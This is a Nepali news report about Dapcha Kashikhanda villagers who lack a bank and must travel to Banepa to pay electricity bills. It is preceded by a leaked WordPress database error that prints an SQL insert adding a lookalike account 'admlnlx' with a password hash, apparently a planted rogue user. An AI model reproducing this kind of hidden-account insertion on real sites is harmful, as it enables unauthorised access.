WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BL87Fyr3059CJyWGZqENeazoIKCAvR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:50:07', '', 'admlnlx', 'admlnlx')
काभ्रे, माघ ९ –
दाप्चा काशिखण्डका बासिन्दा अहिले विद्युत्को महसुल तिर्ने ठाउँ स्थानीय क्षेत्रमा नै नभएकाले निकै सास्ती व्यहोर्नु परेको छ । महसुलका लागि बनेपासम्म पुग्नुपर्दा महशुलको दोब्बरभन्दा बढी भाडा तिर्न बाध्य भएका हुन् ।
अहिले कुनै पनि बैंक नहुँदा चर्को भाडादर तिरेर बनेपासम्म विद्युत् महसुल तिर्न जान बाध्य भएको सोमप्रसाद खनालले बताउनुभयो । ‘रु ८०को महसुल तिर्न रु ५०० खर्च गरेर जानुपर्छ ।’ उहाँले राससलाई भन्नुभयो, ‘स्थानीय क्षेत्रमा नै बैंक भए त्यो समस्याबाटमुक्ति पाइने थियो ।’
आफू बसेको ठाउँबाट करिब साढे दुई घन्टा बसमा बनेपा आउनुपर्छ महसुल तिर्ने ठाउँमा पुग्दा पैसा तिर्ने पालोसमेत नपाइने उहाँको गुनासो छ
यस्तै द्वन्द्वकालपछि कुनै पनि बैंक नहुँदा आफूले चर्को व्याजदर तिरेर कारोबार गर्न बाध्य भएको खनाल बताउनुहुन्छ ।
खनालजस्तै त्यहाँका अर्का स्थानीय प्रद्युम्न श्रेष्ठलाई पनि निकै सास्ती खेपेर बनेपासम्म विद्युत महसुल तिर्न जानुपर्ने बाध्यता छ । बसमा यात्रा गर्दा खर्च लाग्ने मात्र नभई अप्ठेरो निकै सास्ती हुने गरेको उहाँ बताउनुहुन्छ ।
त्यस्तै विद्युतको महसुल तिर्ने स्थान मात्र नभएर स्थानीय क्षेत्रको विकासका लागि बैंक महत्वपूर्ण माध्यम भए पनि पृथ्वीनारायण शाहको पालादेखि नै नेपालको प्रमुख व्यापारिक केन्द्रका रुपमा चिनिने दाप्चा काशिखण्डमा कुनै पनि बैंक नहुँदा यहाँका बासिन्दाले कष्टपूर्ण जीवन बिताइरहेका छन् । ‘विद्युत महसुल तिर्न नजाउँ जरिवानामा परिने डर जाउँ उस्तै सास्ती ।’ काशिखण्डका श्रेष्ठको गुनासो छ । द्वन्द्वकालमा माओवादीले यहाँ विद्युतको महसुल बुझाउने सेवा केन्द्र ध्वस्त पारिदिएका थिए । त्यस्तै २०५६ सालमा माओवादीले स्थानीय क्षेत्रमा भएका राष्ट्रिय वाणिज्य बैंक माओवादी ज्याजती सहन नसकेर सदरमुकाम धुलिखेल सारिएको थियो भने अर्को कृषि विकास बैंक वाणिज्य बैंक भन्दा अगाडि नै ध्वस्त बनाइएको थियो । पछि १२ बुँदे सहमतिमा त्यहाँ भएका बैंकलाई पुनःस्थापना गर्ने भने पनि हालसम्म पनि प्रयास नहुँदा त्यहाँका बासिन्दाले कष्ट भोग्नुपरेको हो।
यहाँ बैंक नहुँदा विद्यार्थीलाई प्रयोगात्मक अभ्यासका लागि पठाउन र क्याम्पसको आर्थिक कारोबार गर्न निकै समस्या भएको गरेको स्थानीय कृष्ण बहुमुखी क्याम्पसका सहायक क्याम्पस प्रमुख राजनप्रसाद अधिकारीले बताउनुभयो ।
यहाँबाट बैङ्क सरेपछि पुनःस्थापनामका लागि सरकारसँग सहमति भए पनि हालसम्म स्थापना हुन नसकेको स्थानीय समाजसेवी पुष्पराज श्रेष्ठले बताउनुभयो । – रासस